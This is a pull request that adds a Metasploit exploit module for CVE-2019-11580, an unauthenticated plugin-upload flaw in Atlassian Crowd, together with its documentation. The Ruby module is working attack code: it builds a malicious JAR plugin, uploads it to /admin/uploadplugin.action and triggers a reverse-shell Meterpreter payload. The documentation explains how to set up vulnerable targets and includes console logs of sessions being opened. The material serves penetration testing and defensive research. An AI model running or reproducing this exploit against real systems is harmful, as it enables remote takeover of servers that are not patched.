### PR TITLE
Push up working CVE-2019-11580 exploit and associated documentation

### DIFF
--- a/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
@@ -24,8 +24,8 @@ To set up a vulnerable Windows 10 installation:
 
 
 To set up a vulnerable 3.2.1 JDK 8 Docker image:
-1. Run `sudo docker volume create --name crowdVolume`
-1. Run `sudo docker run -v crowdVolumeddd:/var/atlassian/application-data/crowd --name="crowd3.2.1" -d -p 8095:8095 atlassian/crowd:3.2.1-jdk8`
+1. `sudo docker volume create --name crowdVolume`
+1. `sudo docker run -v crowdVolumeddd:/var/atlassian/application-data/crowd --name="crowd3.2.1" -d -p 8095:8095 atlassian/crowd:3.2.1-jdk8`
 1. Wait for install to finish then browse to `http://localhost:8095/`.
 1. Click the blue `Set Up Crowd` button to do a new install.
 1. If the Docker image crashes at this point, increase the amount of memory allocated towards it. Java requires a fair bit of memory.
@@ -43,6 +43,8 @@ To set up a vulnerable 3.2.1 JDK 8 Docker image:
 1. You should get a shell back as the user running the Atlassian Crowd application.
 
 ## Options
+### REQUESTTIMEOUT
+The maximum time, in seconds, to wait for requests to time out when making HTTP requests to the target server.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+
+Atlassian Crowd 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5, and 3.4.x prior to 3.4.4
+had an incorrect installation of the pdkinstall development plugin, which allows unauthenticated remote attackers to upload and install
+arbitrary plugins on vulnerable Atlassian Crowd and Atlassian Crowd Data Center installations via a POST request to the
+`/<crowd install base>/admin/uploadplugin.action` page.
+
+Successful exploitation results in remote code execution as the user running the Atlassian Crowd server.
+
+To set up a vulnerable installation:
+1. Grab a copy of Windows, any version will do but I tested on Windows 10.
+1. Grab a copy of the 3.0.3 version of Atlassian Crowd from https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.0.3.zip
+1. Grab a copy of the Java 8 JDK from https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-windows-i586-14_jan_2020.zip
+1. Unzip the JDK to a target directory.
+1. Edit `JAVA_HOME` environment variable and set it to the location where you extracted the Java 8 JDK.
+1. Update the `PATH` environent variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
+1. Extract the Atlassian Crowd zip.
+1. Edit the `atlassian-crowd-3.0.3\apache-tomcat\bin\catalina.bat` file and remove all the `-Djava.endorsed.dirs` options.
+1. Run `start_crowd.bat`
+1. After a few minutes browse to `http://localhost:8095/crowd/` and click the blue button to do a new install.
+1. Follow the default settings, including using the embedded database.
+1. Browse to `http://localhost:8095/crowd/admin/uploadplugin.action`
+1. *Verify* a 400 error message stating that the page requires a `POST` request is shown.
+
+## Verification Steps
+
+1. Follow the steps in `Vulnerable Application`
+1. `use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce`
+1. Set `RHOST` to the target IP
+1. Set `LHOST` to your local IP
+1. `exploit`
+1. You should get a shell back as the user running the Atlassian Crowd application.
+
+## Options
+
+## Scenarios
+
+### Atlassian Crowd 3.0.3 on Windows 10 20H2
+```
+msf6 > use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set RHOSTS 192.168.224.204
+RHOSTS => 192.168.224.204
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set LHOST 192.168.224.128
+LHOST => 192.168.224.128
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options
+
+Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.224.204  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8095             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /crowd/          yes       The base URI to Jira
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.224.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Sending a test request to try install an invalid plugin to see if the server is vulnerable...
+[+] The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating its vulnerable!
+[*] Generating a malicious JAR plugin...
+[*] Uploading the malicious JAR plugin...
+[*] Sending stage (58082 bytes) to 192.168.224.204
+[*] Meterpreter session 1 opened (192.168.224.128:4444 -> 192.168.224.204:53871) at 2021-07-30 11:56:38 -0500
+
+meterpreter > getuid
+Server username: test
+meterpreter > pwd
+C:\Users\test\Desktop\atlassian-crowd-3.0.3
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
@@ -43,8 +43,6 @@ To set up a vulnerable 3.2.1 JDK 8 Docker image:
 1. You should get a shell back as the user running the Atlassian Crowd application.
 
 ## Options
-### REQUESTTIMEOUT
-The maximum time, in seconds, to wait for requests to time out when making HTTP requests to the target server.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
@@ -53,7 +53,7 @@ Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce)
    RHOSTS     192.168.224.204  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      8095             yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /crowd/          yes       The base URI to Jira
+   TARGETURI  /crowd/          yes       The base URI to Atlassian Cloud
    VHOST                       no        HTTP server virtual host
 
 

--- a/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
@@ -7,18 +7,29 @@ arbitrary plugins on vulnerable Atlassian Crowd and Atlassian Crowd Data Center 
 
 Successful exploitation results in remote code execution as the user running the Atlassian Crowd server.
 
-To set up a vulnerable installation:
+To set up a vulnerable Windows 10 installation:
 1. Grab a copy of Windows, any version will do but I tested on Windows 10.
 1. Grab a copy of the 3.0.3 version of Atlassian Crowd from https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.0.3.zip
 1. Grab a copy of the Java 8 JDK from https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-windows-i586-14_jan_2020.zip
 1. Unzip the JDK to a target directory.
 1. Edit `JAVA_HOME` environment variable and set it to the location where you extracted the Java 8 JDK.
-1. Update the `PATH` environent variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
+1. Update the `PATH` environment variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
 1. Extract the Atlassian Crowd zip.
 1. Edit the `atlassian-crowd-3.0.3\apache-tomcat\bin\catalina.bat` file and remove all the `-Djava.endorsed.dirs` options.
 1. Run `start_crowd.bat`
-1. After a few minutes browse to `http://localhost:8095/crowd/` and click the blue button to do a new install.
-1. Follow the default settings, including using the embedded database.
+1. After a few minutes browse to `http://localhost:8095/crowd/` and click the blue `Set Up Crowd` button to do a new install.
+1. Use the default settings, including using the embedded database.
+1. Browse to `http://localhost:8095/crowd/admin/uploadplugin.action`
+1. *Verify* a 400 error message stating that the page requires a `POST` request is shown.
+
+
+To set up a vulnerable 3.2.1 JDK 8 Docker image:
+1. Run `sudo docker volume create --name crowdVolume`
+1. Run `sudo docker run -v crowdVolumeddd:/var/atlassian/application-data/crowd --name="crowd3.2.1" -d -p 8095:8095 atlassian/crowd:3.2.1-jdk8`
+1. Wait for install to finish then browse to `http://localhost:8095/`.
+1. Click the blue `Set Up Crowd` button to do a new install.
+1. If the Docker image crashes at this point, increase the amount of memory allocated towards it. Java requires a fair bit of memory.
+1. Use the default settings, including using the embedded database.
 1. Browse to `http://localhost:8095/crowd/admin/uploadplugin.action`
 1. *Verify* a 400 error message stating that the page requires a `POST` request is shown.
 
@@ -87,5 +98,92 @@ meterpreter > getuid
 Server username: test
 meterpreter > pwd
 C:\Users\test\Desktop\atlassian-crowd-3.0.3
+meterpreter >
+```
+
+### Atlassian Cloud 3.2.1 Linux Docker Image
+```
+msf6 > use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options
+
+Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8095             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /crowd/          yes       The base URI to Atlassian Crowd
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java Universal
+
+
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > check
+
+[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
+[+] 127.0.0.1:8095 - The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!
+msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
+[+] The target is vulnerable. Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!
+[*] Generating a malicious JAR plugin...
+[*] Uploading the malicious JAR plugin...
+[*] Sending stage (58082 bytes) to 172.18.0.2
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:39316) at 2021-08-02 10:56:47 -0500
+
+meterpreter > sysinfo
+Computer    : 3fc6d7283aaa
+OS          : Linux 5.8.0-63-generic (amd64)
+Meterpreter : java/linux
+meterpreter > getuid
+Server username: crowd
+meterpreter > pwd
+/opt/atlassian/crowd
+meterpreter > ls
+Listing: /opt/atlassian/crowd
+=============================
+
+Mode              Size   Type  Last modified              Name
+----              ----   ----  -------------              ----
+100444/r--r--r--  1254   fil   2018-05-09 05:36:38 -0500  README.txt
+40554/r-xr-xr--   4096   dir   2021-07-13 01:52:10 -0500  apache-tomcat
+100444/r--r--r--  252    fil   2018-05-09 05:36:38 -0500  build.bat
+100444/r--r--r--  650    fil   2018-05-09 05:36:38 -0500  build.properties
+100554/r-xr-xr--  204    fil   2018-05-09 05:36:38 -0500  build.sh
+100444/r--r--r--  2847   fil   2018-05-09 05:36:38 -0500  build.xml
+40554/r-xr-xr--   4096   dir   2018-05-09 06:01:28 -0500  client
+40554/r-xr-xr--   4096   dir   2021-07-13 01:52:13 -0500  crowd-openidclient-webapp
+40554/r-xr-xr--   4096   dir   2021-07-13 01:52:14 -0500  crowd-openidserver-webapp
+40554/r-xr-xr--   4096   dir   2021-07-13 01:52:13 -0500  crowd-webapp
+40776/rwxrwxrw-   4096   dir   2021-07-30 17:03:57 -0500  database
+40554/r-xr-xr--   4096   dir   2021-07-13 01:52:09 -0500  etc
+40554/r-xr-xr--   32768  dir   2021-07-13 01:52:15 -0500  licenses
+100444/r--r--r--  407    fil   2018-05-09 05:36:38 -0500  start_crowd.bat
+100554/r-xr-xr--  324    fil   2018-05-09 05:36:38 -0500  start_crowd.sh
+100444/r--r--r--  98     fil   2018-05-09 05:36:38 -0500  stop_crowd.bat
+100554/r-xr-xr--  71     fil   2018-05-09 05:36:38 -0500  stop_crowd.sh
+
 meterpreter >
 ```

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -95,10 +95,10 @@ class MetasploitModule < Msf::Exploit::Remote
             <version>1.0.0</version>
           </plugin-info>
 
-	        <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
-	          <url-pattern>/#{name}</url-pattern>
-	          <description>Calendar App</description>
-	        </servlet>
+          <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
+            <url-pattern>/#{name}</url-pattern>
+            <description>Calendar App</description>
+          </servlet>
         </atlassian-plugin>
       )
 

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -37,6 +37,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Platform' => %w[java],
         'Arch' => ARCH_JAVA,
+        'DefaultOptions' => {
+          'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out.
+        },
         'Notes' =>
           {
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
@@ -61,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8095),
         OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']),
-        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
+
       ]
     )
   end
@@ -69,12 +72,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def upload_plugin(content)
     data = Rex::MIME::Message.new
     data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
-    send_request_raw({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
       'method' => 'POST',
       'data' => data.to_s,
       'ctype' => "multipart/mixed; boundary=#{data.bound}"
-    }, datastore['REQUESTTIMEOUT'])
+    }, datastore['HttpClientTimeout'])
   end
 
   def generate_plugin_jar
@@ -126,6 +129,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
       'method' => 'GET'
-    }, datastore['REQUESTTIMEOUT'])
+    }, datastore['HttpClientTimeout'])
   end
 end

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -1,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
+        'Description' => %q{
+          This module can be used to upload a plugin on Atlassian Cloud via
+          the pdkinstall development plugin as an unauthenticated attacker.
+          The payload is uploaded as a JAR archive containing a servlet using
+          a POST request to /crowd/admin/uploadplugin.action. The check command will
+          check that the /crowd/admin/uploadplugin.action page exists and that it
+          responds appropriately to determine if the target is vulnerable or not.
+        },
+        'Author' => [
+          'Paul', # Vulnerability discovery
+          'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter.
+          'Grant Willcox' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2019-11580'],
+            ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
+            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
+            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+          ],
+        'Platform' => %w[java],
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SAFE ]
+          },
+        'Targets' =>
+          [
+            [
+              'Java Universal',
+              {
+                'Arch' => ARCH_JAVA,
+                'Platform' => 'java'
+              }
+            ]
+          ],
+        'DisclosureDate' => '2019-05-22'
+      )
+      )
+
+    register_options(
+      [
+        Opt::RPORT(8095),
+        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
+      ]
+    )
+  end
+
+  def upload_plugin(content)
+    name = Rex::Text.rand_text_alpha(8..12)
+    boundary = rand_text_numeric(27)
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_cdl\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/octet-stream\r\n\r\n"
+    data << content
+    data << "\r\n--#{boundary}--"
+
+    send_request_raw({
+      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
+      'method' => 'POST',
+      'data' => data,
+      'headers' =>
+        {
+          'Content-Type' => 'multipart/mixed; boundary=' + boundary
+        }
+    }, 25)
+  end
+
+  def generate_plugin_jar
+    name = Rex::Text.rand_text_alpha(8..12)
+    servlet_name = Rex::Text.rand_text_alpha(8..12)
+    atlassian_plugin_xml = %(
+        <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
+          <plugin-info>
+            <param name="atlassian-data-center-compatible">true</param>
+            <description></description>
+            <version>1.0.0</version>
+          </plugin-info>
+
+	        <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
+	          <url-pattern>/#{name}</url-pattern>
+	          <description>Calendar App</description>
+	        </servlet>
+        </atlassian-plugin>
+      )
+
+    # Generates .jar file for upload
+    zip = payload.encoded_jar
+    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+    zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+    contents = zip.pack
+    [contents, name]
+  end
+
+  def check
+    print_status('Sending a test request to try install an invalid plugin to see if the server is vulnerable...')
+    res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
+    if res.nil?
+      return CheckCode::Unknown('Was not able to connect to the target!')
+    elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
+      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating its vulnerable!")
+    end
+
+    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so its not vulnerable!")
+  end
+
+  def exploit
+    print_status('Generating a malicious JAR plugin...')
+    content, plugin_name = generate_plugin_jar
+    print_status('Uploading the malicious JAR plugin...')
+    upload_plugin(content)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
+      'method' => 'GET'
+    }, 25)
+  end
+end

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -66,18 +66,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_plugin(content)
-    name = Rex::Text.rand_text_alpha(8..12)
-    boundary = rand_text_numeric(27)
-    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; "
-    data << "filename=\"#{name}.jar\"\r\n\r\n"
-    data << content
-    data << "\r\n--#{boundary}--"
-
+    data = Rex::MIME::Message.new
+    data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
     send_request_raw({
       'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
       'method' => 'POST',
-      'data' => data,
-      'ctype' => "multipart/mixed; boundary=#{boundary}"
+      'data' => data.to_s,
+      'ctype' => "multipart/mixed; boundary=#{data.bound}"
     }, 25)
   end
 
@@ -114,12 +109,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
     res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
     if res.nil?
-      return CheckCode::Unknown('Was not able to connect to the target!')
+      CheckCode::Unknown('Was not able to connect to the target!')
     elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
-      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!")
+      CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
+    else
+      CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
     end
-
-    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
   end
 
   def exploit

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -60,7 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8095),
-        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/'])
+        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']),
+        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
       ]
     )
   end
@@ -73,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'data' => data.to_s,
       'ctype' => "multipart/mixed; boundary=#{data.bound}"
-    }, 25)
+    }, datastore['REQUESTTIMEOUT'])
   end
 
   def generate_plugin_jar
@@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
             <url-pattern>/#{name}</url-pattern>
-            <description>Calendar App</description>
+            <description>#{Faker::App.name}</description>
           </servlet>
         </atlassian-plugin>
       )
@@ -98,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     zip = payload.encoded_jar
     zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
 
-    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+    servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')
     zip.add_file('/metasploit/PayloadServlet.class', servlet)
 
     contents = zip.pack
@@ -125,6 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
       'method' => 'GET'
-    }, 25)
+    }, datastore['REQUESTTIMEOUT'])
   end
 end

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(
@@ -37,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
           ],
         'Platform' => %w[java],
+        'Arch' => ARCH_JAVA,
         'Notes' =>
           {
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
@@ -55,12 +55,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'DisclosureDate' => '2019-05-22'
       )
-      )
+    )
 
     register_options(
       [
         Opt::RPORT(8095),
-        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
+        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/'])
       ]
     )
   end
@@ -68,8 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def upload_plugin(content)
     name = Rex::Text.rand_text_alpha(8..12)
     boundary = rand_text_numeric(27)
-    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_cdl\"; "
-    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/octet-stream\r\n\r\n"
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; "
+    data << "filename=\"#{name}.jar\"\r\n\r\n"
     data << content
     data << "\r\n--#{boundary}--"
 
@@ -77,10 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
       'method' => 'POST',
       'data' => data,
-      'headers' =>
-        {
-          'Content-Type' => 'multipart/mixed; boundary=' + boundary
-        }
+      'ctype' => "multipart/mixed; boundary=#{boundary}"
     }, 25)
   end
 
@@ -114,15 +111,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    print_status('Sending a test request to try install an invalid plugin to see if the server is vulnerable...')
+    print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
     res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
     if res.nil?
       return CheckCode::Unknown('Was not able to connect to the target!')
     elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
-      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating its vulnerable!")
+      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!")
     end
 
-    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so its not vulnerable!")
+    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
   end
 
   def exploit


### PR DESCRIPTION
After reading the advisory from CISA at https://us-cert.cisa.gov/ncas/alerts/aa21-209a I noticed we didn't have an exploit for CVE-2019-11580 even though its a pretty simple bug that allows one to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and gain unauthenticated RCE on these servers via two relatively simple HTTP requests.

This PR adds in support for exploiting CVE-2019-11580 and also checking if a target is vulnerable to CVE-2019-11580. The check may need further improvements however the exploit works reliably in my experience.

## Verification

List the steps needed to make sure this thing works

- [ ] Follow the steps in `Vulnerable Application` section of the documentation to set up a vulnerable target
- [ ] `use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce`
- [ ] Set `RHOST` to the target IP
- [ ] Set `LHOST` to your local IP
- [ ] `exploit`
- [ ]  You should get a shell back as the user running the Atlassian Crowd application.
